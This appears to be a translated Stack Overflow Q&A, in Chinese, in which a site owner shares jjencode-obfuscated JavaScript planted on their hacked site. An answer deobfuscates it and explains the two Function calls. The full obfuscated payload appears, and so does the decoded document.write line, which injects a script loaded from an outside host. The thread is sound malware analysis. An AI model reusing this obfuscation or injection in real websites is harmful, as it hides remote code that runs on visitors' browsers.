我发现我的一个网站被黑了,经过调查,我查看了上传的 javasript 文件,由于疯狂的混淆,我不敢相信它实际上达到了目的。
我对它非常感兴趣,我需要知道它到底是如何工作的。如果有人可以提供任何信息,将不胜感激!另外,这将帮助我找到我的服务器上其他隐藏的被黑客攻击的文件!
内容如下:
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"=\\\\\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"://"+$.$$_$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.$$_+$._$$+"-\\"+$.__$+$.$$_+$._$$+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$$_+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.___+$._$+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"."+$.$$__+$._$+"\\"+$.__$+$.$_$+$.$_$+"/\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.__$+$.$$_+$._$$+"/"+$.__+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+$.$$_$+$._$+(![]+"")[$._$_]+"/\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$_$+$.__$+$.$$_$+$.$$$_+$.$_$$+$.$_$_+"\\"+$.__$+$.$$_+$._$_+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\\\\\"></\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+">\\\");"+"\"")())();
最佳答案
首先,添加一些空格:
$ = ~ [];
$ = {
___: ++$,
$$$$: (![] + "")[$],
__$: ++$,
$_$_: (![] + "")[$],
_$_: ++$,
$_$$: ({} + "")[$],
$$_$: ($[$] + "")[$],
_$$: ++$,
$$$_: (!"" + "")[$],
$__: ++$,
$_$: ++$,
$$__: ({} + "")[$],
$$_: ++$,
$$$: ++$,
$___: ++$,
$__$: ++$
};
$.$_ = ($.$_ = $ + "")[$.$_$]
+ ($._$ = $.$_[$.__$])
+ ($.$$ = ($.$ + "")[$.__$])
+ ((!$) + "")[$._$$]
+ ($.__ = $.$_[$.$$_])
+ ($.$ = (!"" + "")[$.__$])
+ ($._ = (!"" + "")[$._$_])
+ $.$_[$.$_$]
+ $.__
+ $._$
+ $.$;
$.$$ = $.$
+ (!"" + "")[$._$$]
+ $.__
+ $._
+ $.$
+ $.$$;
$.$ = ($.___)[$.$_][$.$_];
$.$($.$(
$.$$
+ "\"" + $.$$_$ + $._$ + $.$$__ + $._
+ "\\" + $.__$ + $.$_$ + $.$_$ + $.$$$_
+ "\\" + $.__$ + $.$_$ + $.$$_ + $.__
+ ".\\" + $.__$ + $.$$_ + $.$$$
+ "\\" + $.__$ + $.$$_ + $._$_
+ "\\" + $.__$ + $.$_$ + $.__$ + $.__ + $.$$$_
+ "(\\\"<\\" + $.__$ + $.$$_ + $._$$ + $.$$__
+ "\\" + $.__$ + $.$$_ + $._$_
+ "\\" + $.__$ + $.$_$ + $.__$
+ "\\" + $.__$ + $.$$_ + $.___ + $.__
+ "\\" + $.$__ + $.___
+ "\\" + $.__$ + $.$$_ + $._$$
+ "\\" + $.__$ + $.$$_ + $._$_ + $.$$__
+ "=\\\\\\\"\\" + $.__$ + $.$_$ + $.___ + $.__ + $.__
+ "\\" + $.__$ + $.$$_ + $.___ + "://" + $.$$_$
+ "\\" + $.__$ + $.$_$ + $.$$_
+ "\\" + $.__$ + $.$$_ + $._$$
+ "-\\" + $.__$ + $.$$_ + $._$$ + $.$$$_
+ "\\" + $.__$ + $.$$_ + $._$_
+ "\\" + $.__$ + $.$$_ + $.$$_ + $.$$$_
+ "\\" + $.__$ + $.$$_ + $._$_
+ "\\" + $.__$ + $.$_$ + $.___ + $._$
+ "\\" + $.__$ + $.$_$ + $.$_$ + $.$$$_ + "." + $.$$__ + $._$
+ "\\" + $.__$ + $.$_$ + $.$_$
+ "/\\" + $.__$ + $.$$_ + $._$$ + $.$$__
+ "\\" + $.__$ + $.$$_ + $._$_
+ "\\" + $.__$ + $.$_$ + $.__$
+ "\\" + $.__$ + $.$$_ + $.___ + $.__
+ "\\" + $.__$ + $.$$_ + $._$$
+ "/" + $.__
+ "\\" + $.__$ + $.$$_ + $._$_ + $.$_$_
+ "\\" + $.__$ + $.$_$ + $.$_$ + $.$_$_ + $.$$_$ + $._$ + (![] + "")[$._$_]
+ "/\\" + $.__$ + $.$$_ + $._$$ + "\\" + $.__$ + $.$_$ + $.__$ + $.$$_$ + $.$$$_ + $.$_$$ + $.$_$_
+ "\\" + $.__$ + $.$$_ + $._$_ + ".\\" + $.__$ + $.$_$ + $._$_
+ "\\" + $.__$ + $.$$_ + $._$$
+ "\\\\\\\"></\\"
+ $.__$ + $.$$_ + $._$$ + $.$$__
+ "\\" + $.__$ + $.$$_ + $._$_
+ "\\" + $.__$ + $.$_$ + $.__$
+ "\\" + $.__$ + $.$$_ + $.___ + $.__
+ ">\\\");"
+ "\""
)())();
1.
除了最后一条语句之外的所有内容都在创建对象 $
其值主要是数字和字符串,例如 "f"
, 8
,和"return"
.
然而,特别重要的是 $.$
,即Function
。调用Function(s)
创建一个函数体为 s
.
例如,Function('return 1;')
返回function() { return 1; }
.
本质上,Function(s)()
(或者在本例中为 $.$(s)()
)相当于 eval(s)
.
2. 最后一条语句中的所有字符串连接都会创建一个字符串。
return"docu\155e\156t.\167\162\151te(\"<\163c\162\151\160t\40\163\162c=\\\"\150tt\160://d\156\163-\163e\162\166e\162\150o\155e.co\155/\163c\162\151\160t\163/t\162a\155adol/\163\151deba\162.\152\163\\\"></\163c\162\151\160t>\");\"
3.
当用 $.$
评估时以字符串形式返回
document.write("<script src=\"http://dns-serverhome.com/scripts/tramadol/sidebar.js\"></script>");
4.
调用$.$
根据此结果进行第二次攻击即可完成。
这段代码显然是为了让代码看起来尽可能无害,不使用 eval
, Function
, function
,或任何 HTML 实体,如 <
.
两次调用Function
IMO 是不必要的,但我认为它进一步混淆了代码。
现在,关于你的最后一个问题,你打算运行第 3 方 Javascript 吗?如果是这样,我所知道的唯一强大的类似框架是 Google Caja .
编辑:这似乎是 jjencode 的结果对于
document.write("<script src=\"http://dns-serverhome.com/scripts/tramadol/sidebar.js\"></script>");
jjencode 甚至可以选择返回回文混淆。
关于javascript - 非常有趣的 JavaScript 混淆。帮助理解它,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/20535068/